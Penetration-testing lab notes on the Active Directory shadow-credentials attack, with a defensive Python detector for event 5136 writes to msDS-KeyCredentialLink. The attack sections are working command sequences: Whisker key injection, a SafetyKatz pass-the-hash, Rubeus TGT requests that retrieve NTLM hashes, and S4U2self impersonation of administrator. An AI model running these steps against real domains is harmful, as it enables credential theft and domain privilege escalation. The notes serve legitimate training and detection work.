# shadow-credentials

## Methodology

1. Control an account with GenericAll, GenericWrite or write access on the target object's `msDS-KeyCredentialLink` attribute (members of Key Admins and Enterprise Key Admins have this by default).
2. Check that the domain controller runs at least Windows Server 2016 (key trust PKINIT authentication requires it).

## Binaries

> [!INFO] Remember to follow the Binaries methodology

## Whisker

**Add shadow credential:**

```batchfile
Whisker.exe add /target:supportXuser
```

**Check if shadow credential is added**

```powershell
Get-DomainUser -Identity supportXuser
```
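From the defender's side, the step above is the one that leaves a trace: the attribute write itself. The following added example (not part of the original notes) detects it from Windows Security event 5136 ("A directory service object was modified") records, which fire when a SACL on the object audits writes to `msDS-KeyCredentialLink`. It flags value-added writes made by a principal other than the object itself (Windows Hello for Business enrolment writes the user's own object) and outside an allowlist, and decodes the DN-Binary attribute value (KEYCREDENTIALLINK_BLOB, MS-ADTS 2.2.20) to pull out the DeviceId. It covers both user objects (this section) and computer objects (the "Abusing Computer Object" section). The event records, the allowlisted account name and the key blob are constructed for the example.

```python
"""Detect shadow-credential writes from Windows Security event 5136 records.

EventData field names (SubjectUserName, ObjectDN, ObjectClass,
AttributeLDAPDisplayName, AttributeValue, OperationType) are the standard
5136 fields. The sample events below are constructed, not captured.
"""
from dataclasses import dataclass

KEYCRED_ATTR = "msDS-KeyCredentialLink"
VALUE_ADDED = "%%14674"      # 5136 OperationType resource string: "Value Added"
VALUE_DELETED = "%%14675"    # "Value Deleted" (Whisker remove / clear)

# Assumption: principals allowed to write the attribute on objects other than
# their own (e.g. a WHfB/device-registration service account). Hypothetical name.
ALLOWED_WRITERS = {"SVC-KEYPROV$"}

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.2)
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}


@dataclass
class Finding:
    writer: str
    target_dn: str
    object_class: str
    device_id: str


def parse_keycredential_value(dn_binary: str) -> dict:
    """Decode a DN-Binary value "B:<hexlen>:<hex>:<DN>" into the blob's entries."""
    parts = dn_binary.split(":", 3)
    if len(parts) != 4 or parts[0] != "B":
        raise ValueError("not a DN-Binary value")
    blob = bytes.fromhex(parts[2])
    version = int.from_bytes(blob[:4], "little")   # expected 0x200
    entries, pos = {}, 4
    while pos + 3 <= len(blob):                     # Length(2) | Identifier(1) | Value
        length = int.from_bytes(blob[pos:pos + 2], "little")
        ident = blob[pos + 2]
        entries[ENTRY_NAMES.get(ident, f"0x{ident:02x}")] = blob[pos + 3:pos + 3 + length]
        pos += 3 + length
    return {"version": version, "entries": entries, "dn": parts[3]}


def _cn_from_dn(dn: str) -> str:
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def _self_write(writer: str, dn: str) -> bool:
    """True when the writing principal is the object being modified."""
    return writer.rstrip("$").lower() == _cn_from_dn(dn).rstrip("$").lower()


def detect_shadow_credentials(events) -> list:
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != KEYCRED_ATTR:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        writer, dn = ev.get("SubjectUserName", ""), ev.get("ObjectDN", "")
        if writer.upper() in ALLOWED_WRITERS or _self_write(writer, dn):
            continue
        try:
            dev = parse_keycredential_value(ev.get("AttributeValue", ""))["entries"].get("DeviceId", b"")
            device_id = dev.hex()
        except ValueError:
            device_id = "unparsed"
        findings.append(Finding(writer, dn, ev.get("ObjectClass", ""), device_id))
    return findings


# Constructed blob: version 0x200, KeyUsage=0x01 (NGC), KeySource=0x00 (AD), 16-byte DeviceId.
SAMPLE_BLOB_HEX = "00020000" "010004" "01" "010005" "00" "100006" "11223344556677889900aabbccddeeff"
_BASE = "OU=Lab,DC=us,DC=contoso,DC=local"
SAMPLE_EVENTS = [
    # legitimate: user enrols a key on its own object
    {"EventID": 5136, "SubjectUserName": "alice", "ObjectDN": f"CN=alice,{_BASE}", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": f"B:62:{SAMPLE_BLOB_HEX}:CN=alice,{_BASE}"},
    # suspicious: another principal writes a key to a user object
    {"EventID": 5136, "SubjectUserName": "lowpriv", "ObjectDN": f"CN=supportXuser,{_BASE}", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": f"B:62:{SAMPLE_BLOB_HEX}:CN=supportXuser,{_BASE}"},
    # suspicious: a key written to a computer object by a user account
    {"EventID": 5136, "SubjectUserName": "mgmtadmin", "ObjectDN": f"CN=us-helpdesk,{_BASE}", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": f"B:62:{SAMPLE_BLOB_HEX}:CN=us-helpdesk,{_BASE}"},
    # noise: a different attribute
    {"EventID": 5136, "SubjectUserName": "lowpriv", "ObjectDN": f"CN=bob,{_BASE}", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED, "AttributeValue": "x"},
]

if __name__ == "__main__":
    for f in detect_shadow_credentials(SAMPLE_EVENTS):
        print(f"ALERT {f.writer} wrote {KEYCRED_ATTR} on {f.object_class} {f.target_dn} (DeviceId {f.device_id})")
```

The 5136 event only exists if auditing of directory service changes is enabled and the objects carry a SACL for the attribute write, so the first check in any domain is whether those events are being produced at all. Corroborate hits with Kerberos 4768 events whose certificate fields are populated for the same account, since PKINIT pre-authentication by an account that never enrolled a key is the second half of this technique.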

**Request the TGT by leveraging the certificate**

```batchfile
# Retrieve NTLM hash
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.contoso.local /dc:US-DC.us.contoso.local /getcredentials /show /nowrap

# Pass the ticket
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.contoso.local /dc:US-DC.us.contoso.local /getcredentials /show /nowrap /ptt
```

**Inject the TGT in the current session or use the NTLM hash:**

```batchfile
Rubeus.exe ptt /ticket:doIGgDCCBnygAwIBBaEDAgEW...
```

### Abusing Computer Object

**Add the Shadow Credentials.**

```batchfile
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:mgmtadmin /domain:us.techcorp.local /aes256:32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f /run:cmd.exe" "exit"
Whisker.exe add /target:us-helpdesk$
```

**Using PowerView, see if the Shadow Credential is added.**

```powershell
Get-DomainComputer -Identity us-helpdesk
```

**Request the TGT by using the certificate.**

```batchfile
Rubeus.exe asktgt /user:us-helpdesk$ /certificate:MIIJ0AIBAzCCCYwGCSqGSIb... /password:"ViGFoZJa..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show
```

**Request and inject a TGS impersonating the user.** With the computer's TGT, use S4U2self to obtain a service ticket for `cifs/us-helpdesk` as `administrator` and inject it into the current session.

```batchfile
Rubeus.exe s4u /dc:us-dc.us.techcorp.local /ticket:doIGkDCCBoygAwIBBaEDAgEW... /impersonateuser:administrator /ptt /self /altservice:cifs/us-helpdesk
```
